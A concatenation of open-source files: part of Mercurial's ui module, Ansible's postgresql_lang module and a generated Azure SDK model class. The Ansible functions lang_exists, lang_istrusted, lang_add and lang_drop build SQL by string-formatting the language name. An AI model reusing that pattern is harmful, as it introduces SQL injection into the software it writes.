parts[-1] = parts[-1][:-1] + s[offset]
return _parse_plain, parts, offset + 1
parts[-1] += s[offset]
return _parse_plain, parts, offset + 1
def _parse_quote(parts, s, offset):
if offset < len(s) and s[offset] == '"': # ""
parts.append('')
offset += 1
while offset < len(s) and (s[offset].isspace() or
s[offset] == ','):
offset += 1
return _parse_plain, parts, offset
while offset < len(s) and s[offset] != '"':
if (s[offset] == '\\' and offset + 1 < len(s)
and s[offset + 1] == '"'):
offset += 1
parts[-1] += '"'
else:
parts[-1] += s[offset]
offset += 1
if offset >= len(s):
real_parts = _configlist(parts[-1])
if not real_parts:
parts[-1] = '"'
else:
real_parts[0] = '"' + real_parts[0]
parts = parts[:-1]
parts.extend(real_parts)
return None, parts, offset
offset += 1
while offset < len(s) and s[offset] in [' ', ',']:
offset += 1
if offset < len(s):
if offset + 1 == len(s) and s[offset] == '"':
parts[-1] += '"'
offset += 1
else:
parts.append('')
else:
return None, parts, offset
return _parse_plain, parts, offset
def _configlist(s):
s = s.rstrip(' ,')
if not s:
return []
parser, parts, offset = _parse_plain, [''], 0
while parser:
parser, parts, offset = parser(parts, s, offset)
return parts
result = self.config(section, name, untrusted=untrusted)
if result is None:
result = default or []
if isinstance(result, basestring):
result = _configlist(result.lstrip(' ,\n'))
if result is None:
result = default or []
return result
def hasconfig(self, section, name, untrusted=False):
return self._data(untrusted).hasitem(section, name)
def has_section(self, section, untrusted=False):
'''tell whether section exists in config.'''
return section in self._data(untrusted)
def configitems(self, section, untrusted=False, ignoresub=False):
items = self._data(untrusted).items(section)
if ignoresub:
newitems = {}
for k, v in items:
if ':' not in k:
newitems[k] = v
items = newitems.items()
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in self._ucfg.items(section):
if self._tcfg.get(section, k) != v:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, k, v))
return items
def walkconfig(self, untrusted=False):
cfg = self._data(untrusted)
for section in cfg.sections():
for name, value in self.configitems(section, untrusted):
yield section, name, value
def plain(self, feature=None):
'''is plain mode active?
Plain mode means that all configuration variables which affect
the behavior and output of Mercurial should be
ignored. Additionally, the output should be stable,
reproducible and suitable for use in scripts or applications.
The only way to trigger plain mode is by setting either the
`HGPLAIN' or `HGPLAINEXCEPT' environment variables.
The return value can either be
- False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
- True otherwise
'''
if 'HGPLAIN' not in os.environ and 'HGPLAINEXCEPT' not in os.environ:
return False
exceptions = os.environ.get('HGPLAINEXCEPT', '').strip().split(',')
if feature and exceptions:
return feature not in exceptions
return True
def username(self):
"""Return default username to be used in commits.
Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
and stop searching if one of these is set.
If not found and ui.askusername is True, ask the user, else use
($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
"""
user = os.environ.get("HGUSER")
if user is None:
user = self.config("ui", ["username", "user"])
if user is not None:
user = os.path.expandvars(user)
if user is None:
user = os.environ.get("EMAIL")
if user is None and self.configbool("ui", "askusername"):
user = self.prompt(_("enter a commit username:"), default=None)
if user is None and not self.interactive():
try:
user = '%s@%s' % (util.getuser(), socket.getfqdn())
self.warn(_("no username found, using '%s' instead\n") % user)
except KeyError:
pass
if not user:
raise error.Abort(_('no username supplied'),
hint=_('use "hg config --edit" '
'to set your username'))
if "\n" in user:
raise error.Abort(_("username %s contains a newline\n")
% repr(user))
return user
def shortuser(self, user):
"""Return a short representation of a user name or email address."""
if not self.verbose:
user = util.shortuser(user)
return user
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
try:
p = self.paths.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
pass
if default:
try:
p = self.paths.getpath(default)
if p:
return p.rawloc
except error.RepoError:
pass
return loc
@util.propertycache
def paths(self):
return paths(self)
def pushbuffer(self, error=False, subproc=False, labeled=False):
"""install a buffer to capture standard output of the ui object
If error is True, the error output will be captured too.
If subproc is True, output from subprocesses (typically hooks) will be
captured too.
If labeled is True, any labels associated with buffered
output will be handled. By default, this has no effect
on the output returned, but extensions and GUI tools may
handle this argument and returned styled output. If output
is being buffered so it can be captured and parsed or
processed, labeled should not be set to True.
"""
self._buffers.append([])
self._bufferstates.append((error, subproc, labeled))
self._bufferapplylabels = labeled
def popbuffer(self):
'''pop the last buffer and return the buffered output'''
self._bufferstates.pop()
if self._bufferstates:
self._bufferapplylabels = self._bufferstates[-1][2]
else:
self._bufferapplylabels = None
return "".join(self._buffers.pop())
def write(self, *args, **opts):
'''write args to output
By default, this method simply writes to the buffer or stdout,
but extensions or GUI tools may override this method,
write_err(), popbuffer(), and label() to style output from
various parts of hg.
An optional keyword argument, "label", can be passed in.
This should be a string containing label names separated by
space. Label names take the form of "topic.type". For example,
ui.debug() issues a label of "ui.debug".
When labeling output for a specific command, a label of
"cmdname.type" is recommended. For example, status issues
a label of "status.modified" for modified files.
'''
if self._buffers:
self._buffers[-1].extend(a for a in args)
else:
self._progclear()
for a in args:
self.fout.write(a)
def write_err(self, *args, **opts):
self._progclear()
try:
if self._bufferstates and self._bufferstates[-1][0]:
return self.write(*args, **opts)
if not getattr(self.fout, 'closed', False):
self.fout.flush()
for a in args:
self.ferr.write(a)
# stderr may be buffered under win32 when redirected to files,
# including stdout.
if not getattr(self.ferr, 'closed', False):
self.ferr.flush()
except IOError as inst:
if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
raise
def flush(self):
try: self.fout.flush()
except (IOError, ValueError): pass
try: self.ferr.flush()
except (IOError, ValueError): pass
def _isatty(self, fh):
if self.configbool('ui', 'nontty', False):
return False
return util.isatty(fh)
def interactive(self):
'''is interactive input allowed?
An interactive session is a session where input can be reasonably read
from `sys.stdin'. If this function returns false, any attempt to read
from stdin should fail with an error, unless a sensible default has been
specified.
Interactiveness is triggered by the value of the `ui.interactive'
configuration variable or - if it is unset - when `sys.stdin' points
to a terminal device.
This function refers to input only; for output, see `ui.formatted()'.
'''
i = self.configbool("ui", "interactive", None)
if i is None:
# some environments replace stdin without implementing isatty
# usually those are non-interactive
return self._isatty(self.fin)
return i
def termwidth(self):
'''how wide is the terminal in columns?
'''
if 'COLUMNS' in os.environ:
try:
return int(os.environ['COLUMNS'])
except ValueError:
pass
return util.termwidth()
def formatted(self):
'''should formatted output be used?
It is often desirable to format the output to suite the output medium.
Examples of this are truncating long lines or colorizing messages.
However, this is not often not desirable when piping output into other
utilities, e.g. `grep'.
Formatted output is triggered by the value of the `ui.formatted'
configuration variable or - if it is unset - when `sys.stdout' points
to a terminal device. Please note that `ui.formatted' should be
considered an implementation detail; it is not intended for use outside
Mercurial or its extensions.
This function refers to output only; for input, see `ui.interactive()'.
This function always returns false when in plain mode, see `ui.plain()'.
'''
if self.plain():
return False
i = self.configbool("ui", "formatted", None)
if i is None:
# some environments replace stdout without implementing isatty
# usually those are non-interactive
return self._isatty(self.fout)
return i
def _readline(self, prompt=''):
if self._isatty(self.fin):
try:
# magically add command line editing support, where
# available
import readline
# force demandimport to really load the module
readline.read_history_file
# windows sometimes raises something other than ImportError
except Exception:
pass
# call write() so output goes through subclassed implementation
# e.g. color extension on Windows
self.write(prompt)
# instead of trying to emulate raw_input, swap (self.fin,
# self.fout) with (sys.stdin, sys.stdout)
oldin = sys.stdin
oldout = sys.stdout
sys.stdin = self.fin
sys.stdout = self.fout
# prompt ' ' must exist; otherwise readline may delete entire line
# - http://bugs.python.org/issue12833
line = raw_input(' ')
sys.stdin = oldin
sys.stdout = oldout
# When stdin is in binary mode on Windows, it can cause
# raw_input() to emit an extra trailing carriage return
if os.linesep == '\r\n' and line and line[-1] == '\r':
line = line[:-1]
return line
def prompt(self, msg, default="y"):
"""Prompt user with msg, read response.
If ui is not interactive, the default is returned.
"""
if not self.interactive():
self.write(msg, ' ', default or '', "\n")
return default
try:
r = self._readline(self.label(msg, 'ui.prompt'))
if not r:
r = default
if self.configbool('ui', 'promptecho'):
self.write(r, "\n")
return r
except EOFError:
raise error.ResponseExpected()
@staticmethod
def extractchoices(prompt):
"""Extract prompt message and list of choices from specified prompt.
This returns tuple "(message, choices)", and "choices" is the
list of tuple "(response character, text without &)".
>>> ui.extractchoices("awake? $$ &Yes $$ &No")
('awake? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("line\\nbreak? $$ &Yes $$ &No")
('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("want lots of $$money$$?$$Ye&s$$N&o")
('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
"""
# Sadly, the prompt string may have been built with a filename
# containing "$$" so let's try to find the first valid-looking
# prompt to start parsing. Sadly, we also can't rely on
# choices containing spaces, ASCII, or basically anything
# except an ampersand followed by a character.
m = re.match(r'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
msg = m.group(1)
choices = [p.strip(' ') for p in m.group(2).split('$$')]
return (msg,
[(s[s.index('&') + 1].lower(), s.replace('&', '', 1))
for s in choices])
def promptchoice(self, prompt, default=0):
"""Prompt user with a message, read response, and ensure it matches
one of the provided choices. The prompt is formatted as follows:
"would you like fries with that (Yn)? $$ &Yes $$ &No"
The index of the choice is returned. Responses are case
insensitive. If ui is not interactive, the default is
returned.
"""
msg, choices = self.extractchoices(prompt)
resps = [r for r, t in choices]
while True:
r = self.prompt(msg, resps[default])
if r.lower() in resps:
return resps.index(r.lower())
self.write(_("unrecognized response\n"))
def getpass(self, prompt=None, default=None):
if not self.interactive():
return default
try:
self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
# disable getpass() only if explicitly specified. it's still valid
# to interact with tty even if fin is not a tty.
if self.configbool('ui', 'nontty'):
return self.fin.readline().rstrip('\n')
else:
return getpass.getpass('')
except EOFError:
raise error.ResponseExpected()
def status(self, *msg, **opts):
'''write status message to output (if ui.quiet is False)
This adds an output label of "ui.status".
'''
if not self.quiet:
opts['label'] = opts.get('label', '') + ' ui.status'
self.write(*msg, **opts)
def warn(self, *msg, **opts):
'''write warning message to output (stderr)
This adds an output label of "ui.warning".
'''
opts['label'] = opts.get('label', '') + ' ui.warning'
self.write_err(*msg, **opts)
def note(self, *msg, **opts):
'''write note to output (if ui.verbose is True)
This adds an output label of "ui.note".
'''
if self.verbose:
opts['label'] = opts.get('label', '') + ' ui.note'
self.write(*msg, **opts)
def debug(self, *msg, **opts):
'''write debug message to output (if ui.debugflag is True)
This adds an output label of "ui.debug".
'''
if self.debugflag:
opts['label'] = opts.get('label', '') + ' ui.debug'
self.write(*msg, **opts)
def edit(self, text, user, extra=None, editform=None, pending=None):
extra_defaults = { 'prefix': 'editor' }
if extra is not None:
extra_defaults.update(extra)
extra = extra_defaults
(fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
suffix=".txt", text=True)
try:
f = os.fdopen(fd, "w")
f.write(text)
f.close()
environ = {'HGUSER': user}
if 'transplant_source' in extra:
environ.update({'HGREVISION': hex(extra['transplant_source'])})
for label in ('intermediate-source', 'source', 'rebase_source'):
if label in extra:
environ.update({'HGREVISION': extra[label]})
break
if editform:
environ.update({'HGEDITFORM': editform})
if pending:
environ.update({'HG_PENDING': pending})
editor = self.geteditor()
self.system("%s \"%s\"" % (editor, name),
environ=environ,
onerr=error.Abort, errprefix=_("edit failed"))
f = open(name)
t = f.read()
f.close()
finally:
os.unlink(name)
return t
def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None):
'''execute shell command with appropriate output stream. command
output will be redirected if fout is not stdout.
'''
out = self.fout
if any(s[1] for s in self._bufferstates):
out = self
return util.system(cmd, environ=environ, cwd=cwd, onerr=onerr,
errprefix=errprefix, out=out)
def traceback(self, exc=None, force=False):
'''print exception traceback if traceback printing enabled or forced.
only to call in exception handler. returns true if traceback
printed.'''
if self.tracebackflag or force:
if exc is None:
exc = sys.exc_info()
cause = getattr(exc[1], 'cause', None)
if cause is not None:
causetb = traceback.format_tb(cause[2])
exctb = traceback.format_tb(exc[2])
exconly = traceback.format_exception_only(cause[0], cause[1])
# exclude frame where 'exc' was chained and rethrown from exctb
self.write_err('Traceback (most recent call last):\n',
''.join(exctb[:-1]),
''.join(causetb),
''.join(exconly))
else:
output = traceback.format_exception(exc[0], exc[1], exc[2])
self.write_err(''.join(output))
return self.tracebackflag or force
def geteditor(self):
'''return editor to use'''
if sys.platform == 'plan9':
# vi is the MIPS instruction simulator on Plan 9. We
# instead default to E to plumb commit messages to
# avoid confusion.
editor = 'E'
else:
editor = 'vi'
return (os.environ.get("HGEDITOR") or
self.config("ui", "editor") or
os.environ.get("VISUAL") or
os.environ.get("EDITOR", editor))
@util.propertycache
def _progbar(self):
"""setup the progbar singleton to the ui object"""
if (self.quiet or self.debugflag
or self.configbool('progress', 'disable', False)
or not progress.shouldprint(self)):
return None
return getprogbar(self)
def _progclear(self):
"""clear progress bar output if any. use it before any output"""
if '_progbar' not in vars(self): # nothing loaded yet
return
if self._progbar is not None and self._progbar.printed:
self._progbar.clear()
def progress(self, topic, pos, item="", unit="", total=None):
'''show a progress message
With stock hg, this is simply a debug message that is hidden
by default, but with extensions or GUI tools it may be
visible. 'topic' is the current operation, 'item' is a
non-numeric marker of the current position (i.e. the currently
in-process file), 'pos' is the current numeric position (i.e.
revision, bytes, etc.), unit is a corresponding unit label,
and total is the highest expected pos.
Multiple nested topics may be active at a time.
All topics should be marked closed by setting pos to None at
termination.
'''
if self._progbar is not None:
self._progbar.progress(topic, pos, item=item, unit=unit,
total=total)
if pos is None or not self.configbool('progress', 'debug'):
return
if unit:
unit = ' ' + unit
if item:
item = ' ' + item
if total:
pct = 100.0 * pos / total
self.debug('%s:%s %s/%s%s (%4.2f%%)\n'
% (topic, item, pos, total, unit, pct))
else:
self.debug('%s:%s %s%s\n' % (topic, item, pos, unit))
def log(self, service, *msg, **opts):
'''hook for logging facility extensions
service should be a readily-identifiable subsystem, which will
allow filtering.
*msg should be a newline-terminated format string to log, and
then any values to %-format into that format string.
**opts currently has no defined meanings.
'''
def label(self, msg, label):
'''style msg based on supplied label
Like ui.write(), this just returns msg unchanged, but extensions
and GUI tools can override it to allow styling output without
writing it.
ui.write(s, 'label') is equivalent to
ui.write(ui.label(s, 'label')).
'''
return msg
def develwarn(self, msg, stacklevel=1):
"""issue a developer warning message
Use 'stacklevel' to report the offender some layers further up in the
stack.
"""
msg = 'devel-warn: ' + msg
stacklevel += 1 # get in develwarn
if self.tracebackflag:
util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
else:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
self.write_err('%s at: %s:%s (%s)\n'
% ((msg,) + calframe[stacklevel][1:4]))
def deprecwarn(self, msg, version):
"""issue a deprecation warning
- msg: message explaining what is deprecated and how to upgrade,
- version: last version where the API will be supported,
"""
msg += ("\n(compatibility will be dropped after Mercurial-%s,"
" update your code.)") % version
self.develwarn(msg, stacklevel=2)
class paths(dict):
"""Represents a collection of paths and their configs.
Data is initially derived from ui instances and the config files they have
loaded.
"""
def __init__(self, ui):
dict.__init__(self)
for name, loc in ui.configitems('paths', ignoresub=True):
# No location is the same as not existing.
if not loc:
continue
loc, sub = ui.configsuboptions('paths', name)
self[name] = path(ui, name, rawloc=loc, suboptions=sub)
def getpath(self, name, default=None):
"""Return a ``path`` from a string, falling back to default.
``name`` can be a named path or locations. Locations are filesystem
paths or URIs.
Returns None if ``name`` is not a registered path, a URI, or a local
path to a repo.
"""
# Only fall back to default if no path was requested.
if name is None:
if not default:
default = ()
elif not isinstance(default, (tuple, list)):
default = (default,)
for k in default:
try:
return self[k]
except KeyError:
continue
return None
# Most likely empty string.
# This may need to raise in the future.
if not name:
return None
try:
return self[name]
except KeyError:
# Try to resolve as a local path or URI.
try:
# We don't pass sub-options in, so no need to pass ui instance.
return path(None, None, rawloc=name)
except ValueError:
raise error.RepoError(_('repository %s does not exist') %
name)
_pathsuboptions = {}
def pathsuboption(option, attr):
"""Decorator used to declare a path sub-option.
Arguments are the sub-option name and the attribute it should set on
``path`` instances.
The decorated function will receive as arguments a ``ui`` instance,
``path`` instance, and the string value of this option from the config.
The function should return the value that will be set on the ``path``
instance.
This decorator can be used to perform additional verification of
sub-options and to change the type of sub-options.
"""
def register(func):
_pathsuboptions[option] = (attr, func)
return func
return register
@pathsuboption('pushurl', 'pushloc')
def pushurlpathoption(ui, path, value):
u = util.url(value)
# Actually require a URL.
if not u.scheme:
ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
return None
# Don't support the #foo syntax in the push URL to declare branch to
# push.
if u.fragment:
ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
'ignoring)\n') % path.name)
u.fragment = None
return str(u)
class path(object):
"""Represents an individual path and its configuration."""
def __init__(self, ui, name, rawloc=None, suboptions=None):
"""Construct a path from its config options.
``ui`` is the ``ui`` instance the path is coming from.
``name`` is the symbolic name of the path.
``rawloc`` is the raw location, as defined in the config.
``pushloc`` is the raw locations pushes should be made to.
If ``name`` is not defined, we require that the location be a) a local
filesystem path with a .hg directory or b) a URL. If not,
``ValueError`` is raised.
"""
if not rawloc:
raise ValueError('rawloc must be defined')
# Locations may define branches via syntax <base>#<branch>.
u = util.url(rawloc)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
self.url = u
self.branch = branch
self.name = name
self.rawloc = rawloc
self.loc = str(u)
# When given a raw location but not a symbolic name, validate the
# location is valid.
if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
raise ValueError('location is not a URL or path to a local '
'repo: %s' % rawloc)
suboptions = suboptions or {}
# Now process the sub-options. If a sub-option is registered, its
# attribute will always be present. The value will be None if there
# was no valid sub-option.
for suboption, (attr, func) in _pathsuboptions.iteritems():
if suboption not in suboptions:
setattr(self, attr, None)
continue
value = func(ui, self, suboptions[suboption])
setattr(self, attr, value)
def _isvalidlocalpath(self, path):
"""Returns True if the given path is a potentially valid repository.
This is its own function so that extensions can change the definition of
'valid' in this case (like when pulling from a git repo into a hg
one)."""
return os.path.isdir(os.path.join(path, '.hg'))
@property
def suboptions(self):
"""Return sub-options and their values for this path.
This is intended to be used for presentation purposes.
"""
d = {}
for subopt, (attr, _func) in _pathsuboptions.iteritems():
value = getattr(self, attr)
if value is not None:
d[subopt] = value
return d
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
def getprogbar(ui):
global _progresssingleton
if _progresssingleton is None:
# passing 'ui' object to the singleton is fishy,
# this is how the extension used to work but feel free to rework it.
_progresssingleton = progress.progbar(ui)
return _progresssingleton
| gpl-2.0 |
valentin-krasontovitsch/ansible | lib/ansible/modules/database/postgresql/postgresql_lang.py | 1 | 11522 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2014, Jens Depuydt <http://www.jensd.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_lang
short_description: Adds, removes or changes procedural languages with a PostgreSQL database.
description:
- Adds, removes or changes procedural languages with a PostgreSQL database.
- This module allows you to add a language, remote a language or change the trust
relationship with a PostgreSQL database. The module can be used on the machine
where executed or on a remote host.
- When removing a language from a database, it is possible that dependencies prevent
the database from being removed. In that case, you can specify casade to
automatically drop objects that depend on the language (such as functions in the
language). In case the language can't be deleted because it is required by the
database system, you can specify fail_on_drop=no to ignore the error.
- Be carefull when marking a language as trusted since this could be a potential
security breach. Untrusted languages allow only users with the PostgreSQL superuser
privilege to use this language to create new functions.
version_added: "1.7"
options:
lang:
description:
- name of the procedural language to add, remove or change
required: true
trust:
description:
- make this language trusted for the selected db
type: bool
default: 'no'
db:
description:
- name of database where the language will be added, removed or changed
force_trust:
description:
- marks the language as trusted, even if it's marked as untrusted in pg_pltemplate.
- use with care!
type: bool
default: 'no'
fail_on_drop:
description:
- if C(yes), fail when removing a language. Otherwise just log and continue
- in some cases, it is not possible to remove a language (used by the db-system). When dependencies block the removal, consider using C(cascade).
type: bool
default: 'yes'
cascade:
description:
- when dropping a language, also delete object that depend on this language.
- only used when C(state=absent).
type: bool
default: 'no'
port:
description:
- Database port to connect to.
default: 5432
login_user:
description:
- User used to authenticate with PostgreSQL
default: postgres
login_password:
description:
- Password used to authenticate with PostgreSQL (must match C(login_user))
login_host:
description:
- Host running PostgreSQL where you want to execute the actions.
default: localhost
state:
description:
- The state of the language for the selected database
default: present
choices: [ "present", "absent" ]
login_unix_socket:
description:
- Path to a Unix domain socket for local connections.
version_added: '2.8'
ssl_mode:
description:
- Determines whether or with what priority a secure SSL TCP/IP connection
will be negotiated with the server.
- See U(https://www.postgresql.org/docs/current/static/libpq-ssl.html) for
more information on the modes.
- Default of C(prefer) matches libpq default.
default: prefer
choices: ["disable", "allow", "prefer", "require", "verify-ca", "verify-full"]
version_added: '2.8'
ssl_rootcert:
description:
- Specifies the name of a file containing SSL certificate authority (CA)
certificate(s). If the file exists, the server's certificate will be
verified to be signed by one of these authorities.
version_added: '2.8'
notes:
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module. If
the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host. For Ubuntu-based
systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- "Jens Depuydt (@jensdepuydt)"
- "Thomas O'Donnell (@andytom)"
'''
EXAMPLES = '''
# Add language pltclu to database testdb if it doesn't exist:
- postgresql_lang db=testdb lang=pltclu state=present
# Add language pltclu to database testdb if it doesn't exist and mark it as trusted:
# Marks the language as trusted if it exists but isn't trusted yet
# force_trust makes sure that the language will be marked as trusted
- postgresql_lang:
db: testdb
lang: pltclu
state: present
trust: yes
force_trust: yes
# Remove language pltclu from database testdb:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
# Remove language pltclu from database testdb and remove all dependencies:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
cascade: yes
# Remove language c from database testdb but ignore errors if something prevents the removal:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
fail_on_drop: no
'''
import traceback
try:
import psycopg2
except ImportError:
postgresqldb_found = False
else:
postgresqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
def lang_exists(cursor, lang):
"""Checks if language exists for db"""
query = "SELECT lanname FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.rowcount > 0
def lang_istrusted(cursor, lang):
"""Checks if language is trusted for db"""
query = "SELECT lanpltrusted FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.fetchone()[0]
def lang_altertrust(cursor, lang, trust):
"""Changes if language is trusted for db"""
query = "UPDATE pg_language SET lanpltrusted = %s WHERE lanname=%s"
cursor.execute(query, (trust, lang))
return True
def lang_add(cursor, lang, trust):
"""Adds language for db"""
if trust:
query = 'CREATE TRUSTED LANGUAGE "%s"' % lang
else:
query = 'CREATE LANGUAGE "%s"' % lang
cursor.execute(query)
return True
def lang_drop(cursor, lang, cascade):
"""Drops language for db"""
cursor.execute("SAVEPOINT ansible_pgsql_lang_drop")
try:
if cascade:
cursor.execute("DROP LANGUAGE \"%s\" CASCADE" % lang)
else:
cursor.execute("DROP LANGUAGE \"%s\"" % lang)
except Exception:
cursor.execute("ROLLBACK TO SAVEPOINT ansible_pgsql_lang_drop")
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return False
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return True
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default="postgres"),
login_password=dict(default="", no_log=True),
login_host=dict(default=""),
login_unix_socket=dict(default=""),
db=dict(required=True),
port=dict(default='5432'),
lang=dict(required=True),
state=dict(default="present", choices=["absent", "present"]),
trust=dict(type='bool', default='no'),
force_trust=dict(type='bool', default='no'),
cascade=dict(type='bool', default='no'),
fail_on_drop=dict(type='bool', default='yes'),
ssl_mode=dict(default='prefer', choices=[
'disable', 'allow', 'prefer', 'require', 'verify-ca', 'verify-full']),
ssl_rootcert=dict(default=None),
),
supports_check_mode=True
)
db = module.params["db"]
lang = module.params["lang"]
state = module.params["state"]
trust = module.params["trust"]
force_trust = module.params["force_trust"]
cascade = module.params["cascade"]
fail_on_drop = module.params["fail_on_drop"]
sslrootcert = module.params["ssl_rootcert"]
if not postgresqldb_found:
module.fail_json(msg="the python psycopg2 module is required")
# To use defaults values, keyword arguments must be absent, so
# check which values are empty and don't include in the **kw
# dictionary
params_map = {
"login_host": "host",
"login_user": "user",
"login_password": "password",
"port": "port",
"db": "database",
"ssl_mode": "sslmode",
"ssl_rootcert": "sslrootcert"
}
kw = dict((params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != "" and v is not None)
# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if psycopg2.__version__ < '2.4.3' and sslrootcert is not None:
module.fail_json(msg='psycopg2 must be at least 2.4.3 in order to user the ssl_rootcert parameter')
try:
db_connection = psycopg2.connect(**kw)
cursor = db_connection.cursor()
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert')
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
changed = False
kw = {'db': db, 'lang': lang, 'trust': trust}
if state == "present":
if lang_exists(cursor, lang):
lang_trusted = lang_istrusted(cursor, lang)
if (lang_trusted and not trust) or (not lang_trusted and trust):
if module.check_mode:
changed = True
else:
changed = lang_altertrust(cursor, lang, trust)
else:
if module.check_mode:
changed = True
else:
changed = lang_add(cursor, lang, trust)
if force_trust:
changed = lang_altertrust(cursor, lang, trust)
else:
if lang_exists(cursor, lang):
if module.check_mode:
changed = True
kw['lang_dropped'] = True
else:
changed = lang_drop(cursor, lang, cascade)
if fail_on_drop and not changed:
msg = "unable to drop language, use cascade to delete dependencies or fail_on_drop=no to ignore"
module.fail_json(msg=msg)
kw['lang_dropped'] = changed
if changed:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
kw['changed'] = changed
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 |
Azure/azure-sdk-for-python | sdk/applicationinsights/azure-applicationinsights/azure/applicationinsights/models/events_user_info_py3.py | 1 | 1277 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EventsUserInfo(Model):
"""User info for an event result.
:param id: ID of the user
:type id: str
:param account_id: Account ID of the user
:type account_id: str
:param authenticated_id: Authenticated ID of the user
:type authenticated_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'account_id': {'key': 'accountId', 'type': 'str'},
'authenticated_id': {'key': 'authenticatedId', 'type': 'str'},
}
def __init__(self, *, id: str=None, account_id: str=None, authenticated_id: str=None, **kwargs) -> None:
super(EventsUserInfo, self).__init__(**kwargs)
self.id = id
self.account_id = account_id
self.authenticated_id = authenticated_id
| mit |